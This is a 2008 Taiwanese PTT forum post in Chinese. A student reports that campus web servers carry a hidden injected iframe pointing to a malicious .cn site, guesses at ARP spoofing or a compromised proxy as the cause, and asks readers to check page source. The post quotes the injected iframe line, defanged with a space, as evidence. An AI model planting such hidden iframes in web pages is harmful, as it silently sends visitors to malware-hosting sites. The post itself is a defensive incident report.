※ [本文转录自 MUSTMIS 看板] 作者: yck0210 (我的心不再流浪) 看板: MUSTMIS 标题: [问题] 中毒？木马？请大家帮忙找看看 时间: Wed Oct 22 19:59:40 2008 在我们系上网最近会发现学校许多Server都被挂上大陆网站隐藏语法.... 我先声明，我不站在哪个单位，也不喜欢把技术问题给政治化！ 我只是想找到问题，知道问题的根源，最重要的是让大家有一个安全无虞的网路环境～ 所以，如果大家也发现跟我一样有下列的问题，请回应给我！ 告诉我您在哪上网的？您是浏览哪一个网页才发现的？ 最近学校有些网站会隐藏一些会导入病毒网站的语法.... 这个语法会导致看这网页的同时也导入到这大陆网站！ 至於下载什麽东西我们还不清楚，防毒软体扫瞄本机也没有病毒～ 但是有些网站会看不到内容，状况画面如下列二张图片.... http://img80.imageshack.us/my.php?image=gggggttt1lf5.jpg http://img89.imageshack.us/my.php?image=gggggttt2kf2.jpg 在这些疑似被入侵的网站内，打开网页的原始码的第一行会出现下列语法.... <iframe src=http ://gggggttt.cn/1/zz.htm width=100 height=0></iframe> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ => 网站故意加空格，怕有人误连！ 进这些网站没什麽问题，但有的网页就会打不开，用防毒软体扫也扫不到！ 今天我在网路上survey这个问题，发现台湾地区好像没人反应，都是大陆在讨论～ 我整理了一下，发现它的特性，好像是一种ARP攻击，会造成整个区域网路都中奖！ Norton 网站所公告关於 gggggttt.cn 的说明 http://safeweb.norton.com/report/show?name=gggggttt.cn 原本我的想法如下列所述.... 很多人都知道这个问题，都扫毒了也没发现病毒，计中说网页也没被窜改！ 在学校上网只要是连80 port会经过proxy server， 也就是一般http网页都会经过代理伺服器～ 如果从校外连进学校就不会经过proxy server，也很正常，所以我怀疑是proxy中毒！ 可是有趣的是，只有特定网站才会有这个现象，有的网站就不会有～ 网路上有讨论说Client端跟Server端都没问题，病毒是存在Server的记忆体里， 所以Server重开机就不会有这问题！ 但是问题还是没解决，它有可能藏在SQL Server里面，一被执行又发作了～ 计中说是我们资工系都中毒才会这样，这句话让我们系上的老师都很不爽！ 我曾经想过会不会是路由器被攻击，不过路由器只处理到网路的第三层， 所以应该是不太可能～ 系上太多电脑了，我光测我的实验室就快吐了，有的电脑有这现象，有的没有.... 所以，结论是，有看到这篇文章的朋友们帮我测一下，任何校内或校外的网页都可以！ 看看会不会有这问题，在原始码内的第一行会不会有那一行语法？ 如果有请告诉我，告诉我您在哪上网，看哪一个网页？ 谢谢大家的帮忙！ --

※ 发信站: 批踢踢实业坊(ptt.cc) ◆ From: 210.240.221.175 --

※ 发信站: 批踢踢实业坊(ptt.cc) ◆ From: 211.74.172.225